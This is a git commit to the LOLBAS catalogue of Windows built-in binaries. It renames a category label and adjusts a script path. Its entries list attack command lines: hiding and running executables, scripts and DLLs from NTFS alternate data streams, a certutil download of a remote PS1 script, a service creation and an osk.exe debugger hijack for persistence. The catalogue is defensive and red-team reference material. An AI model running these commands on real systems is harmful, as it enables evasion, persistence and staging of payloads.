Changed alternate data stream to ADS as category

This commit is contained in:
Oddvar Moe 2018-09-26 09:34:01 +02:00
parent 7961a99173
commit d48273583e
19 changed files with 28 additions and 25 deletions

View File

@ -3,7 +3,10 @@
#Author: Oddvar Moe
#If you can use it, be my guest!
$mainpath = "C:\data\gitprojects\LOLBAS"
# Install-Module powershell-yaml
# import-module powershell-yaml
$mainpath = "C:\LOLBAS"
function Convert-YamlToMD

View File

@ -7,7 +7,7 @@ Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105

View File

@ -7,7 +7,7 @@ Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1196
MitreLink: https://attack.mitre.org/wiki/Technique/T1196

View File

@ -7,7 +7,7 @@ Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -23,7 +23,7 @@ Commands:
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -31,7 +31,7 @@ Commands:
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -23,7 +23,7 @@ Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -15,7 +15,7 @@ Commands:
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -31,7 +31,7 @@ Commands:
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170

View File

@ -7,7 +7,7 @@ Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
- Command: regedit C:\ads\file.txt:regfile.reg"
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096

View File

@ -7,7 +7,7 @@ Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -20,7 +20,7 @@ Commands:
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute

View File

@ -7,7 +7,7 @@ Commands:
- Command: wscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096